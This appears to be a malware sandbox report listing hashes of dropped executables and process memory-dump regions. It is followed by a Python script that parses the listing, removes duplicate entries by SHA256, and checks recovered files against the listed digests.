C:\Users\Admin\Pictures\Minor Policy\SN8pRGmvfIetO31nMREgZCBd.exe
Filesize: 247KB
MD5: 95e21e08113fa1ee861e09172fc3b320
SHA1: bc96895c1924a58c0aa41252633ab447e0fdd979
SHA256: 0bcccf1737d0879c490a4769bf80d80b33c9d0cc6fe014862f88411ae35d500d
SHA512: ca0cb250aaf9befeb1dd2529b8b4b9a72c71ae5925bd4cd9e0608994d271d87273fb81bb5977d2acaeb7a79a5149d3923d9f0875c4d57374d721a08b8cf9ba7f
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe
Filesize: 786KB
MD5: a1cde54fe9d33226ec4d18055360cab2
SHA1: 6c8cbd9de2e995ad3094651b488e261ec8ffe31c
SHA256: 0aba70bd33b1ca0006472948c4f22b766cc36b2a49c20f216d19e2308b35315b
SHA512: e878806dbda35a0dee4b42c1a88c2f60a17ccd0c13d0678f90361b4038e4e32ce0272be603b7a7895d587d34153c42061a1b8471abbde524be03875fb4de194a
-
C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe
Filesize: 3.5MB
MD5: 1052035ac557a9deda0fc39038159d23
SHA1: ff12bc2d43224b3ac06f017243961cdf7088045f
SHA256: 6da85e0e847a77dc8e91dd59937d136e9a2f4e3f8bdd364d75e88b9149ea6ad3
SHA512: d260cc7bf3585a098e6b93734208c536c225d77d5a69fefb40cd6c0820efab70dbd6c78ff4f95dfb8909b5c0a1f3b3f1274665460b36cdd9cb3e07a9c0fc8788
-
C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe
Filesize: 4.6MB
MD5: 9c9e4f4c8904c96a5880226662e96fa9
SHA1: a4f0ecaaee1455dfd88bbdb645f23b89312b0feb
SHA256: 61e42d2cafeda7d4fc31e2db86d40ff34d61e7699788a28a7e291444b59e867c
SHA512: 2d1e36eec0082e0cc30f383951706521a62d84bc46777078bb717003ead1315084df324f28f477131bdb4327189825d8ab9ebf7513a8b7818483d1bc467b8707
-
C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe
Filesize: 4.8MB
MD5: 329c9847136f7c8275f666b7a1f8349a
SHA1: d3fe427ef11c6e8df2f89f13bf622f6430c5539a
SHA256: e8e915b8e186fc9338ad8e565dc9e65eeb58f793e10cba19f9d1ac013a4151df
SHA512: 10b4a3b494527e63096b80dd483e2af9860acddd861706f4b4c49f0638e74b54694e5c6ab12364f81ae0b3ed9f7cbcf50fc1c1356e9c5a27e7f41e8a1abef8c9
-
C:\Users\Admin\Pictures\Minor Policy\m7tpR8y__P6zIjNc638scLmV.exe
Filesize: 357KB
MD5: 9ff1b87077411aff1aa4363f7b5227fc
SHA1: 1d5044614c7fbae16593b5168742029c051a3023
SHA256: c5e51b5b4948e9f692f1aa6c10122be201bc8328ab29b584588e35b3f6858b81
SHA512: 47fa85493f9a73ade1e12d52c3ead4f219457a25cc2b11728f5d905d9b30650f6b52349f184f146bb1a94ed8f72e0ae3d5d7bafde4ab2ed454f34f0b2bb66728
-
C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe
Filesize: 137KB
MD5: 1cd36877d5e6e6fafa38f1c9f21cedf3
SHA1: e02d4dfad2a1a82a5bc5f6125bb421a02c42d363
SHA256: d273fc08938b54321f5d01dfa9200573efdf9d6fb9a2daf038aedd9d1f85ad65
SHA512: 98756c55b5a2d2497c854edd0a8b47cd36a22467280989ab3cc520b68307d08f91346f594453c6bbba73d296faca46bc7d996caf3fb0e261587efbb6c207569a
-
C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe
Filesize: 4.6MB
MD5: 19b2a2f229300ec684ab383bf1bf893a
SHA1: 72cfdf090ed0cd1b44244cee7a186e615e90c343
SHA256: a2c0021ab33c99034a3783dbbf6cf4aa92311bfdfbbf38cea06aee1e0f9f1f86
SHA512: 14b69d2a7228735bcfacc2efd27ed2e4b529421f0b4889fbbcd512b70ecdf6de853fc35198a90264b17ccb17e5b56f4aa930fda426a2724da7b6fcaee0d9aefd
-
C:\Users\Admin\Pictures\Minor Policy\oMPcKCByxz6c6aQOVuge8D1R.exe
Filesize: 248KB
MD5: 0b4af7d3141b917023d7f9093b870f3f
SHA1: 0cfa307e94551228429bdf9bb2ab7546aada3872
SHA256: a56f2561ec0ca55fe2e3b815e04f8cda0c1398ad1f67e0542f20e843eaa82847
SHA512: 302c4d8c0cbbadeb041023297c1ac30d0bfe20e226391c03198cd837e6fb82f5ef379a7c0c34f658f71528a0040e1ca9db88caf63d3968438653218c291f2cfd
-
C:\Users\Admin\Pictures\Minor Policy\r66VAUj92jmJRCibPDw4l9Kb.exe
Filesize: 382KB
MD5: 9b57e42650ac3801c41097a7a67c8797
SHA1: 047b845b1fe47b819de4b31ade6e504aa0288e06
SHA256: 322f8b985672fe452211e1299a29037be69a9b467e8a8cdcad02afd0835e1dee
SHA512: 2361e69ad10dd9c75c732bcbbc01edf85b3bb0b07b357718e27657576a04d468cfc7a17c427e4cb8a3a3999c589077dd87fc3404a5bdde41de03278aba54ba85
-
C:\Users\Admin\Pictures\Minor Policy\uV50xbiY4LlMWsebJOoi_R_O.exe
Filesize: 256KB
MD5: b73a68ae8d7299b24807c7480afade91
SHA1: 8b6ef9aa64e94e1a0d9c9a7bcdeb500cfd727f4e
SHA256: c2da7cb4355da5eb69e84eb2fc99ed331c29963b685f35e2882a4c93e2b54fe2
SHA512: bd5cc7cd695a1904e4c9743a539cbdd2712344ba464630118711fbc17fcd8ac50f638cddf498da0d6d9432b6cdf6da48ca3442842c83c69a258c711dd3199305
-
\??\pipe\LOCAL\crashpad_4880_ENVKIVEOFZKUDWVU
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(All four values are the digests of zero-length input: the Crashpad named pipe carried no file content, so this entry is a handle artefact of the browser's crash reporter, not an indicator to hunt for.)
-
memory/380-256-0x0000000007720000-0x000000000782A000-memory.dmp  Filesize: 1.0MB
memory/380-264-0x0000000005730000-0x000000000576C000-memory.dmp  Filesize: 240KB
memory/380-253-0x0000000005D90000-0x00000000063A8000-memory.dmp  Filesize: 6.1MB
memory/380-207-0x0000000000000000-mapping.dmp
memory/380-225-0x00000000009C0000-0x00000000009E8000-memory.dmp  Filesize: 160KB
memory/380-349-0x0000000005BE0000-0x0000000005C30000-memory.dmp  Filesize: 320KB
memory/380-287-0x00000000059B0000-0x0000000005A16000-memory.dmp  Filesize: 408KB
memory/380-302-0x00000000080B0000-0x0000000008654000-memory.dmp  Filesize: 5.6MB
memory/380-301-0x0000000005AC0000-0x0000000005B52000-memory.dmp  Filesize: 584KB
memory/480-133-0x0000000000000000-mapping.dmp
memory/1072-154-0x0000000000000000-mapping.dmp
memory/1576-229-0x0000000000000000-mapping.dmp
memory/1876-143-0x0000000000000000-mapping.dmp
memory/1988-135-0x0000000000000000-mapping.dmp
memory/2140-335-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
memory/2140-314-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
memory/2140-316-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
memory/2140-319-0x0000000000400000-0x0000000000537000-memory.dmp  Filesize: 1.2MB
memory/2140-311-0x0000000000000000-mapping.dmp
memory/2200-145-0x0000000000000000-mapping.dmp
memory/2624-147-0x0000000000000000-mapping.dmp
memory/2640-152-0x0000000000000000-mapping.dmp
memory/2760-313-0x0000000000000000-mapping.dmp
memory/2760-322-0x000001C3F8A90000-0x000001C3F8A96000-memory.dmp  Filesize: 24KB
memory/2760-345-0x00007FFCBF530000-0x00007FFCBFFF1000-memory.dmp  Filesize: 10.8MB
memory/2760-385-0x000001CBFE090000-0x000001CBFE836000-memory.dmp  Filesize: 7.6MB
memory/2876-139-0x0000000000000000-mapping.dmp
memory/3624-151-0x0000000000000000-mapping.dmp
memory/3920-158-0x0000000000000000-mapping.dmp
memory/4092-161-0x0000000000000000-mapping.dmp
memory/4156-163-0x0000000000000000-mapping.dmp
memory/4272-390-0x0000000007F20000-0x00000000080E2000-memory.dmp  Filesize: 1.8MB
memory/4272-339-0x0000000006FA0000-0x0000000007016000-memory.dmp  Filesize: 472KB
memory/4272-290-0x0000000000000000-mapping.dmp
memory/4272-292-0x0000000001340000-0x000000000135C000-memory.dmp  Filesize: 112KB
memory/4272-350-0x00000000067D0000-0x00000000067EE000-memory.dmp  Filesize: 120KB
memory/4272-393-0x0000000008620000-0x0000000008B4C000-memory.dmp  Filesize: 5.2MB
memory/4280-149-0x0000000000000000-mapping.dmp
memory/4356-160-0x0000000000000000-mapping.dmp
memory/4504-355-0x0000000000000000-mapping.dmp
memory/4504-364-0x0000000000510000-0x000000000056E000-memory.dmp  Filesize: 376KB
memory/4600-141-0x0000000000000000-mapping.dmp
memory/4632-165-0x0000000000000000-mapping.dmp
memory/4840-156-0x0000000000000000-mapping.dmp
memory/4880-132-0x0000000000000000-mapping.dmp
memory/4980-136-0x0000000000000000-mapping.dmp
memory/5060-153-0x0000000000000000-mapping.dmp
memory/5276-166-0x0000000000810000-0x00000000012D2000-memory.dmp  Filesize: 10.8MB
memory/5276-252-0x0000000000810000-0x00000000012D2000-memory.dmp  Filesize: 10.8MB
memory/5276-169-0x0000000000810000-0x00000000012D2000-memory.dmp  Filesize: 10.8MB
memory/5276-205-0x0000000000810000-0x00000000012D2000-memory.dmp  Filesize: 10.8MB
memory/5716-408-0x0000000000400000-0x000000000045F000-memory.dmp  Filesize: 380KB
memory/5716-170-0x0000000000000000-mapping.dmp
memory/5716-411-0x0000000000719000-0x0000000000740000-memory.dmp  Filesize: 156KB
memory/5716-304-0x0000000000400000-0x000000000045F000-memory.dmp  Filesize: 380KB
memory/5716-306-0x0000000000719000-0x0000000000740000-memory.dmp  Filesize: 156KB
memory/5716-307-0x0000000000560000-0x00000000005A3000-memory.dmp  Filesize: 268KB
memory/5728-171-0x0000000000000000-mapping.dmp
memory/5736-234-0x0000000000000000-mapping.dmp
memory/5736-254-0x0000000000600000-0x0000000000632000-memory.dmp  Filesize: 200KB
memory/5736-237-0x0000000000600000-0x0000000000632000-memory.dmp  Filesize: 200KB
memory/5736-276-0x0000000000600000-0x0000000000632000-memory.dmp  Filesize: 200KB
memory/5740-172-0x0000000000000000-mapping.dmp
memory/5740-220-0x00000000001A0000-0x00000000001E1000-memory.dmp  Filesize: 260KB
memory/5752-308-0x00000000004B9000-0x00000000004CA000-memory.dmp  Filesize: 68KB
memory/5752-310-0x00000000001C0000-0x00000000001C9000-memory.dmp  Filesize: 36KB
memory/5752-341-0x0000000000400000-0x0000000000446000-memory.dmp  Filesize: 280KB
memory/5752-312-0x0000000000400000-0x0000000000446000-memory.dmp  Filesize: 280KB
memory/5752-173-0x0000000000000000-mapping.dmp
memory/5764-232-0x0000000140000000-0x0000000140608000-memory.dmp  Filesize: 6.0MB
memory/5764-174-0x0000000000000000-mapping.dmp
memory/5772-247-0x0000000000B30000-0x0000000000B58000-memory.dmp  Filesize: 160KB
memory/5772-243-0x0000000000000000-mapping.dmp
memory/5772-260-0x00000000052E0000-0x00000000052F2000-memory.dmp  Filesize: 72KB
memory/5776-175-0x0000000000000000-mapping.dmp
memory/5788-176-0x0000000000000000-mapping.dmp
memory/5788-321-0x0000000002210000-0x000000000232B000-memory.dmp  Filesize: 1.1MB
memory/5788-318-0x000000000205F000-0x00000000020F1000-memory.dmp  Filesize: 584KB
memory/5800-231-0x0000000000FA0000-0x0000000001368000-memory.dmp  Filesize: 3.8MB
memory/5800-177-0x0000000000000000-mapping.dmp
memory/5800-416-0x0000000005F20000-0x0000000005FBC000-memory.dmp  Filesize: 624KB
memory/5812-414-0x0000000000400000-0x00000000005BC000-memory.dmp  Filesize: 1.7MB
memory/5812-417-0x0000000000690000-0x0000000000699000-memory.dmp  Filesize: 36KB
memory/5812-413-0x00000000006C0000-0x0000000000700000-memory.dmp  Filesize: 256KB
memory/5812-178-0x0000000000000000-mapping.dmp
memory/5812-418-0x0000000000850000-0x000000000085D000-memory.dmp  Filesize: 52KB
memory/5812-410-0x0000000000899000-0x00000000008CB000-memory.dmp  Filesize: 200KB
memory/5968-435-0x0000000000400000-0x0000000000567000-memory.dmp  Filesize: 1.4MB
memory/5968-197-0x0000000000000000-mapping.dmp
memory/5992-198-0x0000000000000000-mapping.dmp
memory/6012-337-0x00000000007BD000-0x00000000007E9000-memory.dmp  Filesize: 176KB
memory/6012-199-0x0000000000000000-mapping.dmp
memory/6012-315-0x0000000000720000-0x0000000000769000-memory.dmp  Filesize: 292KB
memory/6012-317-0x0000000000400000-0x000000000045F000-memory.dmp  Filesize: 380KB
memory/6012-432-0x0000000000400000-0x000000000045F000-memory.dmp  Filesize: 380KB
memory/6020-331-0x00000000006A0000-0x00000000010A4000-memory.dmp  Filesize: 10.0MB
memory/6020-214-0x0000000000000000-mapping.dmp
memory/6020-235-0x00000000006A0000-0x00000000010A4000-memory.dmp  Filesize: 10.0MB
memory/6028-300-0x0000000000400000-0x00000000005AB000-memory.dmp  Filesize: 1.7MB
memory/6028-282-0x0000000000400000-0x00000000005AB000-memory.dmp  Filesize: 1.7MB
memory/6028-200-0x0000000000000000-mapping.dmp
memory/6036-281-0x0000000000C30000-0x00000000015C6000-memory.dmp  Filesize: 9.6MB
memory/6036-328-0x0000000000C30000-0x00000000015C6000-memory.dmp  Filesize: 9.6MB
memory/6036-378-0x0000000077730000-0x00000000778D3000-memory.dmp  Filesize: 1.6MB
memory/6036-230-0x0000000000C30000-0x00000000015C6000-memory.dmp  Filesize: 9.6MB
memory/6036-275-0x0000000077730000-0x00000000778D3000-memory.dmp  Filesize: 1.6MB
memory/6036-213-0x0000000000000000-mapping.dmp
memory/6044-215-0x0000000000000000-mapping.dmp
memory/6044-381-0x0000000077730000-0x00000000778D3000-memory.dmp  Filesize: 1.6MB
memory/6044-246-0x00000000007C0000-0x000000000111E000-memory.dmp  Filesize: 9.4MB
memory/6044-278-0x0000000077730000-0x00000000778D3000-memory.dmp  Filesize: 1.6MB
memory/6044-280-0x00000000007C0000-0x000000000111E000-memory.dmp  Filesize: 9.4MB
memory/6056-201-0x0000000000000000-mapping.dmp
memory/6064-202-0x0000000000000000-mapping.dmp
memory/6064-228-0x0000000000180000-0x00000000001C1000-memory.dmp  Filesize: 260KB
memory/6072-203-0x0000000000000000-mapping.dmp
memory/10216-348-0x0000000000000000-mapping.dmp
memory/14996-325-0x0000000000000000-mapping.dmp
memory/21564-394-0x0000000000000000-mapping.dmp
memory/27816-255-0x0000000000000000-mapping.dmp
memory/27816-443-0x0000000002780000-0x0000000002862000-memory.dmp  Filesize: 904KB
memory/27816-438-0x0000000002570000-0x0000000002695000-memory.dmp  Filesize: 1.1MB
memory/27816-273-0x00000000021E0000-0x000000000233E000-memory.dmp  Filesize: 1.4MB
memory/45648-295-0x0000000000000000-mapping.dmp
memory/51464-442-0x0000000000000000-mapping.dmp
memory/59600-333-0x0000000000000000-mapping.dmp
memory/59600-383-0x00000000035B0000-0x0000000003804000-memory.dmp  Filesize: 2.3MB
memory/59760-423-0x0000000000000000-mapping.dmp
memory/59796-430-0x0000000000400000-0x0000000000420000-memory.dmp  Filesize: 128KB
memory/59796-424-0x0000000000000000-mapping.dmp
memory/66408-344-0x0000000000000000-mapping.dmp
memory/71640-407-0x0000000000000000-mapping.dmp
memory/72496-340-0x0000000000000000-mapping.dmp
memory/73588-357-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-303-0x0000000000000000-mapping.dmp
memory/73588-363-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-361-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-359-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-324-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-305-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-354-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-327-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-330-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-334-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-343-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-352-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-347-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-338-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73588-367-0x0000000000D20000-0x0000000000D74000-memory.dmp  Filesize: 336KB
memory/73612-309-0x0000000000000000-mapping.dmp
memory/73644-299-0x0000000000400000-0x00000000004A2000-memory.dmp  Filesize: 648KB
memory/73644-284-0x0000000000000000-mapping.dmp
memory/73644-286-0x0000000000400000-0x00000000004A2000-memory.dmp  Filesize: 648KB
memory/73696-293-0x0000000000000000-mapping.dmp
memory/73696-297-0x0000000000710000-0x000000000076F000-memory.dmp  Filesize: 380KB
memory/73724-285-0x0000000000730000-0x0000000000758000-memory.dmp  Filesize: 160KB
memory/73724-283-0x0000000000000000-mapping.dmp
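The listing above is emitted with each field label fused onto the preceding value ("...exeFilesize", "MD5338057..."), the same dropped file repeated two or three times, and one entry (the Crashpad pipe) whose digests are simply those of empty input. As an added example, not part of the sandbox report, the Python below parses that flattened form into records, collapses repeats by SHA256, and flags empty-content entries; digests_of() also lets a file recovered from a host be checked against the listed hashes. The embedded sample text is a handful of entries copied from the report; the handling of a fused "MD5" label on a pipe name is a heuristic chosen for that one entry.

```python
"""Parse the flattened dropped-file / memory-dump listing of a sandbox report."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Optional

# Expected hex length of each digest the report carries.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_DIGEST_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)([0-9a-fA-F]+)$")

# Constructed sample: entries copied from the report, in its flattened form
# (label fused onto the previous value, entries separated by a lone "-").
SAMPLE = r"""
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exeFilesize
72KB
MD5338057ba65f786f4238be340d64daf08
SHA16571744dbdf2150179e46fbf4de2ce8ba715cbf2
SHA256bfb5009ee0d70c0e594a9f35fb56d541b91a9e7ab1f396ba01b986f1567e5bac
SHA51237e2a8a12dab1481bcb60fa8afdc9613cbff8e5d873754e3c6142e882d742c0f9ea19f1bac6ce1f6644b3e1c1022a7aab73105f53c2ccf4e9a71405fac89de34
-
C:\Users\Admin\Pictures\Minor Policy\KJN4UTMVm4u4hm7saACgHkd5.exeFilesize
72KB
MD5338057ba65f786f4238be340d64daf08
SHA16571744dbdf2150179e46fbf4de2ce8ba715cbf2
SHA256bfb5009ee0d70c0e594a9f35fb56d541b91a9e7ab1f396ba01b986f1567e5bac
SHA51237e2a8a12dab1481bcb60fa8afdc9613cbff8e5d873754e3c6142e882d742c0f9ea19f1bac6ce1f6644b3e1c1022a7aab73105f53c2ccf4e9a71405fac89de34
-
\??\pipe\LOCAL\crashpad_4880_ENVKIVEOFZKUDWVUMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/380-256-0x0000000007720000-0x000000000782A000-memory.dmpFilesize
1.0MB
-
memory/380-207-0x0000000000000000-mapping.dmp
-
"""


@dataclass
class Artifact:
    path: str
    size: Optional[str] = None
    digests: dict[str, str] = field(default_factory=dict)


def parse_listing(text: str) -> list[Artifact]:
    """Split the listing on its "-" separator lines and rebuild one record per entry."""
    records: list[Artifact] = []
    for chunk in re.split(r"^-$", text, flags=re.MULTILINE):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if not lines:
            continue
        head, rest = lines[0], lines[1:]
        art = Artifact(path=head)
        if head.endswith("Filesize") and rest:
            # "...exeFilesize" / "...dmpFilesize": the size sits on the next line.
            art.path, art.size = head[: -len("Filesize")], rest.pop(0)
        elif head.endswith("MD5") and rest and re.fullmatch(r"[0-9a-fA-F]{32}", rest[0]):
            # Heuristic (assumption) for the crashpad pipe entry: the MD5 label
            # was fused onto the pipe name and its value spilled onto the next line.
            art.path = head[: -len("MD5")]
            art.digests["MD5"] = rest.pop(0).lower()
        for ln in rest:
            m = _DIGEST_LINE.match(ln)
            if not m or len(m.group(2)) != DIGEST_LEN[m.group(1)]:
                raise ValueError(f"unrecognised line under {art.path!r}: {ln!r}")
            art.digests[m.group(1)] = m.group(2).lower()
        records.append(art)
    return records


def dedupe(records: list[Artifact]) -> list[tuple[Artifact, int]]:
    """Collapse entries with identical content (same SHA256, or same path when no
    digest is recorded) and count how often each one appeared in the report."""
    seen: dict[str, list] = {}
    for art in records:
        key = art.digests.get("SHA256", art.path)
        if key in seen:
            seen[key][1] += 1
        else:
            seen[key] = [art, 1]
    return [(art, n) for art, n in seen.values()]


def digests_of(data: bytes) -> dict[str, str]:
    """MD5/SHA1/SHA256/SHA512 of a byte string, keyed like the report's labels."""
    return {algo: hashlib.new(algo.lower(), data).hexdigest() for algo in DIGEST_LEN}


def matches(art: Artifact, data: bytes) -> bool:
    """True when every digest the report lists for `art` matches `data`."""
    actual = digests_of(data)
    return bool(art.digests) and all(actual[a] == v for a, v in art.digests.items())


def is_empty_content(art: Artifact) -> bool:
    """True when the listed digests are those of zero bytes (nothing was captured)."""
    return matches(art, b"")


if __name__ == "__main__":
    for art, count in dedupe(parse_listing(SAMPLE)):
        flag = " (empty content)" if is_empty_content(art) else ""
        print(f"{count}x {art.path} {art.size or ''} {art.digests.get('SHA256', '')}{flag}")
```

Feed the whole report text to parse_listing() instead of SAMPLE to get the full de-duplicated hash set; to check a file recovered from a host, read it as bytes and call matches() against the record whose path it was dropped under.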